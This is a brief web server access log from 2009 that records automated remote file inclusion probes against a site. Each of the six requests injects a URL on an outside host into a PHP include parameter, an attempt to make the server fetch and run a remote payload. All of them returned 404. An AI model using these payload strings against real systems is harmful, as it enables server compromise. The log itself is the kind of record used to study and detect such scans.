211.230.156.161 - - [02/Jul/2009:17:28:58 -0700] "GET /logs/access.log//include/lib.inc.php?site_path=http://rsh.kiev.ua/images/idfx1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "site.inkjetcartridge.com"
211.230.156.161 - - [02/Jul/2009:17:28:58 -0700] "GET /logs//include/lib.inc.php?site_path=http://rsh.kiev.ua/images/idfx1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "site.inkjetcartridge.com"
195.34.78.110 - - [02/Jul/2009:17:48:12 -0700] "GET /phpBB2//includes/openid/Auth/OpenID/BBStore.php?openid_root_path=http://blendcolours.com/scc/1.swf?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "site.inkjetcartridge.com"
195.34.78.110 - - [02/Jul/2009:17:48:12 -0700] "GET /includes/openid/Auth/OpenID/BBStore.php?openid_root_path=http://blendcolours.com/scc/1.swf?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "site.inkjetcartridge.com"
195.34.78.110 - - [02/Jul/2009:17:48:43 -0700] "GET /includes/openid/Auth/OpenID/BBStore.php?openid_root_path=http://blendcolours.com/scc/1.swf?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "site.inkjetcartridge.com"
195.34.78.110 - - [02/Jul/2009:17:48:43 -0700] "GET /phpBB2//includes/openid/Auth/OpenID/BBStore.php?openid_root_path=http://blendcolours.com/scc/1.swf?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "site.inkjetcartridge.com"
